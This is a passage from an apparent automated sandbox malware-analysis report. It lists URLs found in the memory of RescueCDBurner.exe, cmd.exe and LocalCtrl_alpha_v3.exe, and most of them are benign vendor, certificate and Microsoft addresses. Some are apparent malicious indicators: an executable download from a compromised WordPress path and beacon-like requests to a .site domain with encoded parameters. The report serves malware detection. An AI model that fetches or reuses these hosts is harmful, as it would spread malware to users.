Source: RescueCDBurner.exe, RescueCDBurner.exe, 00000004.00000002.1433239437.000000006B419000.00000002.00000001.01000000.00000015.sdmp	String found in binary or memory: http://trolltech.com/xml/features/report-start-end-entity
Source: RescueCDBurner.exe, 00000003.00000002.1371930733.000000006C5F9000.00000002.00000001.01000000.0000000B.sdmp, RescueCDBurner.exe, 00000003.00000003.1352020687.0000000000EF4000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1433239437.000000006B419000.00000002.00000001.01000000.00000015.sdmp	String found in binary or memory: http://trolltech.com/xml/features/report-start-end-entityUnknown
Source: RescueCDBurner.exe, RescueCDBurner.exe, 00000004.00000002.1433239437.000000006B419000.00000002.00000001.01000000.00000015.sdmp	String found in binary or memory: http://trolltech.com/xml/features/report-whitespace-only-CharData
Source: RescueCDBurner.exe, 00000003.00000002.1371930733.000000006C5F9000.00000002.00000001.01000000.0000000B.sdmp, RescueCDBurner.exe, 00000003.00000003.1352020687.0000000000EF4000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1433239437.000000006B419000.00000002.00000001.01000000.00000015.sdmp	String found in binary or memory: http://trolltech.com/xml/features/report-whitespace-only-CharDatahttp://xml.org/sax/features/namespa
Source: RescueCDBurner.exe, 00000003.00000002.1370083717.0000000009AB2000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1430634708.0000000009D9B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1707439030.0000000005033000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.???.xx/?search=%s
Source: RescueCDBurner.exe, 00000003.00000003.1352328069.000000000A823000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: RescueCDBurner.exe, 00000003.00000002.1370083717.0000000009AB2000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1430634708.0000000009D9B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1707439030.0000000005033000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: RescueCDBurner.exe, 00000004.00000002.1425578694.0000000000934000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: http://www.google-analytics.com/collect
Source: RescueCDBurner.exe, 00000003.00000002.1370083717.0000000009A5C000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1430634708.0000000009D45000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1707439030.0000000004FEA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.info-zip.org/
Source: RescueCDBurner.exe, 00000003.00000002.1372101532.000000006C6C9000.00000002.00000001.01000000.0000000A.sdmp, RescueCDBurner.exe, 00000004.00000002.1433533431.000000006B4E9000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://www.phreedom.org/md5)
Source: RescueCDBurner.exe, 00000003.00000002.1372101532.000000006C6C9000.00000002.00000001.01000000.0000000A.sdmp, RescueCDBurner.exe, 00000004.00000002.1433533431.000000006B4E9000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://www.phreedom.org/md5)41UTN-USERFirst-Hardware72:03:21:05:c5:0c:08:57:3d:8e:a5:30:4e:fe:e8:b0D
Source: RescueCDBurner.exe, 00000003.00000000.1339692384.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1356442812.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1355407575.0000000000934000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1425578694.0000000000934000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: http://www.reneelab.biz/
Source: RescueCDBurner.exe, 00000003.00000000.1339692384.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1356442812.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1355407575.0000000000934000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1425578694.0000000000934000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: http://www.reneelab.biz/redefinir-senha-de-admin-logon-windows.htmlhttp://support.reneelab.com/anony
Source: RescueCDBurner.exe, 00000003.00000000.1339692384.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1356442812.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1355407575.0000000000934000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1425578694.0000000000934000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: http://www.reneelab.cc/
Source: RescueCDBurner.exe, 00000003.00000000.1339692384.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1356442812.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1355407575.0000000000934000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1425578694.0000000000934000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: http://www.reneelab.com.cn/
Source: RescueCDBurner.exe, 00000003.00000000.1339692384.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1356442812.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1355407575.0000000000934000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1425578694.0000000000934000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: http://www.reneelab.com.cn/product-land-286.htmlhttp://support.reneelab.com/anonymous_requests/newst
Source: RescueCDBurner.exe, 00000003.00000000.1339692384.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1356442812.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1355407575.0000000000934000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1425578694.0000000000934000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: http://www.reneelab.com/
Source: RescueCDBurner.exe, 00000003.00000000.1339692384.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1356442812.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1355407575.0000000000934000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1425578694.0000000000934000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: http://www.reneelab.com/product-land-188.htmlhttp://support.reneelab.com/anonymous_requests/newstore
Source: RescueCDBurner.exe, 00000003.00000000.1339692384.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1356442812.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1355407575.0000000000934000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1425578694.0000000000934000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: http://www.reneelab.de/
Source: RescueCDBurner.exe, 00000003.00000000.1339692384.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1356442812.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1355407575.0000000000934000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1425578694.0000000000934000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: http://www.reneelab.de/product-land-237.htmlhttp://support.reneelab.com/anonymous_requests/newstore/
Source: RescueCDBurner.exe, 00000003.00000000.1339692384.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1356442812.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1355407575.0000000000934000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1425578694.0000000000934000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: http://www.reneelab.es/
Source: RescueCDBurner.exe, 00000003.00000000.1339692384.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1356442812.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1355407575.0000000000934000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1425578694.0000000000934000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: http://www.reneelab.es/product-land-280.htmlhttp://support.reneelab.com/anonymous_requests/newstore/
Source: RescueCDBurner.exe, 00000003.00000000.1339692384.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1356442812.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1355407575.0000000000934000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1425578694.0000000000934000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: http://www.reneelab.fr/
Source: RescueCDBurner.exe, 00000003.00000000.1339692384.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1356442812.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1355407575.0000000000934000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1425578694.0000000000934000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: http://www.reneelab.it/
Source: RescueCDBurner.exe, 00000003.00000000.1339692384.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1356442812.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1355407575.0000000000934000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1425578694.0000000000934000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: http://www.reneelab.it/reimpostare-passwordi-di-windows-login.html
Source: RescueCDBurner.exe, 00000003.00000000.1339692384.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1356442812.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1355407575.0000000000934000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1425578694.0000000000934000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: http://www.reneelab.jp/
Source: RescueCDBurner.exe, 00000003.00000000.1339692384.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1356442812.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1355407575.0000000000934000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1425578694.0000000000934000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: http://www.reneelab.jp/product-land-286.htmlhttp://support.reneelab.com/anonymous_requests/newstore/
Source: RescueCDBurner.exe, 00000003.00000000.1339692384.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1356442812.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1355407575.0000000000934000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1425578694.0000000000934000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: http://www.reneelab.kr/
Source: RescueCDBurner.exe, 00000003.00000000.1339692384.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1356442812.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1355407575.0000000000934000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1425578694.0000000000934000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: http://www.reneelab.net/
Source: RescueCDBurner.exe, 00000003.00000000.1339692384.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1356442812.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1355407575.0000000000934000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1425578694.0000000000934000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: http://www.reneelab.net//reset-windows-password.htmlhttp://support.reneelab.com/anonymous_requests/n
Source: RescueCDBurner.exe, 00000003.00000000.1339692384.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1356442812.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1355407575.0000000000934000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1425578694.0000000000934000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: http://www.reneelab.pl/
Source: RescueCDBurner.exe, 00000003.00000000.1339692384.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1356442812.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1355407575.0000000000934000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1425578694.0000000000934000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: http://www.reneelab.pl/product-land-280.htmlhttp://support.reneelab.com/anonymous_requests/newpurcha
Source: RescueCDBurner.exe, 00000003.00000000.1339692384.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1356442812.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1355407575.0000000000934000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1425578694.0000000000934000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: http://www.reneelab.ru/
Source: RescueCDBurner.exe, 00000003.00000002.1370083717.0000000009AB2000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1430634708.0000000009D9B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1707439030.0000000005033000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.softwareok.com
Source: RescueCDBurner.exe, 00000003.00000002.1370083717.0000000009AB2000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1430634708.0000000009D9B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1707439030.0000000005033000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.softwareok.de
Source: cmd.exe, 00000005.00000002.1707439030.0000000005033000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.surfok.de/
Source: RescueCDBurner.exe, 00000003.00000002.1370083717.0000000009AB2000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1430634708.0000000009D9B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1707439030.0000000005033000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.symauth.com/cps0(
Source: RescueCDBurner.exe, 00000003.00000002.1370083717.0000000009AB2000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1430634708.0000000009D9B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1707439030.0000000005033000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.symauth.com/rpa00
Source: RescueCDBurner.exe, 00000004.00000002.1425578694.0000000000934000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: http://www.trialpay.com/productpage/?c=3016dc6&tid=6rpipbo
Source: RescueCDBurner.exe, 00000003.00000002.1370083717.0000000009AB2000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1430634708.0000000009D9B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1707439030.0000000005033000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.vmware.com/0
Source: RescueCDBurner.exe, 00000003.00000002.1370083717.0000000009AB2000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1430634708.0000000009D9B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1707439030.0000000005033000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.vmware.com/0/
Source: RescueCDBurner.exe, 00000004.00000002.1425578694.0000000000934000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: http://www.winimage.com/zLibDll
Source: RescueCDBurner.exe, 00000003.00000000.1339692384.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1356442812.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000003.1352328069.000000000A823000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000000.1355407575.0000000000934000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1425578694.0000000000934000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: http://www.winimage.com/zLibDll1.2.6
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2300257481.00000000080BC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2300257481.00000000080BC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: RescueCDBurner.exe, RescueCDBurner.exe, 00000004.00000002.1433239437.000000006B419000.00000002.00000001.01000000.00000015.sdmp	String found in binary or memory: http://xml.org/sax/features/namespace-prefixes
Source: RescueCDBurner.exe, RescueCDBurner.exe, 00000004.00000002.1433239437.000000006B419000.00000002.00000001.01000000.00000015.sdmp	String found in binary or memory: http://xml.org/sax/features/namespaces
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2288219961.0000000002EE5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2288219961.0000000002EE5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com%22
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2300620973.0000000002EE5000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2288219961.0000000002EE5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/MarketMismatchCoachMark.299d15b5c8b6a1a89031.j
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2300620973.0000000002EE5000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2288219961.0000000002EE5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/background-gallery.078daa21cfb37d404ae1.js
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2300620973.0000000002EE5000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2288219961.0000000002EE5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/feedback.4ca3042d6ee42614004f.js
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2300620973.0000000002EE5000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2288219961.0000000002EE5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/nas-highlight-v1.94c0190808bd5252056f.js
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2288219961.0000000002EE5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/nurturing-placement-manager.52a7b8467c1cb4d144
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2300620973.0000000002EE5000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2288219961.0000000002EE5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/ocvFeedback.13e1b09423b11e6198b5.js
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2300620973.0000000002EE5000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2288219961.0000000002EE5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/pill-wc.6705de96e957a57fb475.js
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2300620973.0000000002EE5000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2288219961.0000000002EE5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/sign-in-control-wc.367cab6cb9bb41af1876.js
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2300620973.0000000002EE5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/vendors.80e71276f1bec5cb9e6b.js
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2300620973.0000000002EE5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/waffle-wc.5e95a6e8b96055fbd144.js
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2300620973.0000000002EE5000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2288219961.0000000002EE5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/config/v1/&os=windows&locale=
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2056380672.0000000002E7E000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2056696968.0000000002E3F000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2659623429.0000000002E25000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://avrupabaski.com/wp-content/upgrade/wsn.exe
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2288219961.0000000002EE5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://azureedge.net
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2339940175.00000000006B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bamarelakij.site/
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2438767796.0000000002E7E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://bamarelakij.site/han.html
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2452154985.000000000065F000.00000004.00000020.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2408000909.000000000065F000.00000004.00000020.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2657389325.000000000065F000.00000004.00000020.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2339606429.000000000065F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bamarelakij.site/han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHE
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2408000909.000000000067A000.00000004.00000020.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2339606429.000000000065F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bamarelakij.site/han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2438767796.0000000002E7E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://bamarelakij.site/han.htmlm
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2065326779.000000000067A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bamarelakij.site:443
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2408000909.000000000067A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bamarelakij.site:443/han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFz
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2300257481.00000000080BC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-strea
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2300257481.00000000080BC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://bzib.nelreports.net/api/report?cat=bingbusiness
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2288219961.0000000002EE5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2288219961.0000000002EE5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://clients2.googleusercontent.com
Source: RescueCDBurner.exe, 00000003.00000002.1370083717.0000000009AB2000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1430634708.0000000009D9B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1707439030.0000000005033000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/cps0%
Source: RescueCDBurner.exe, 00000003.00000002.1370083717.0000000009AB2000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1430634708.0000000009D9B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1707439030.0000000005033000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/rpa0
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2288219961.0000000002EE5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: RescueCDBurner.exe, 00000003.00000000.1339692384.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1356442812.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000003.1352328069.000000000A823000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000000.1355407575.0000000000934000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1425578694.0000000000934000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: https://downloads.reneelab.com.cn/download_api.php
Source: RescueCDBurner.exe, 00000003.00000000.1339692384.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1356442812.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1355407575.0000000000934000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1425578694.0000000000934000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: https://downloads.reneelab.com.cn/passnow/passnow_
Source: RescueCDBurner.exe, 00000003.00000000.1339692384.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1356442812.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000003.1352328069.000000000A823000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000000.1355407575.0000000000934000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1425578694.0000000000934000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: https://downloads.reneelab.com/download_api.php
Source: RescueCDBurner.exe, 00000003.00000000.1339692384.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1356442812.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000003.1352328069.000000000A823000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000000.1355407575.0000000000934000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1425578694.0000000000934000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: https://downloads.reneelab.com/download_api.phphttps://downloads.reneelab.com.cn/download_api.php?ac
Source: RescueCDBurner.exe, 00000003.00000000.1339692384.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1356442812.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1355407575.0000000000934000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1425578694.0000000000934000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: https://downloads.reneelab.com/passnow/passnow_
